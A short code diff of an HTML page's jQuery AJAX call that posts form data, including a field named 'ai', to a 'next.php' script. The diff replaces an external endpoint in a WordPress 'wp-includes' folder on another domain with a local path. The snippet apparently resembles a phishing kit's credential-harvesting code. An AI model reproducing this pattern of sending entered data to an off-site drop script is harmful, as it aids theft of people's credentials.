--- a/index.html
+++ b/index.html
@@ -268,7 +268,7 @@ $(document).ready(function() {
 
         $.ajax({
             dataType: 'JSON',
-            url: 'https://scaletech.com.co/wp-includes/next.php',
+            url: 'next.php',
             type: 'POST',
             data: {
                 ai: ai,
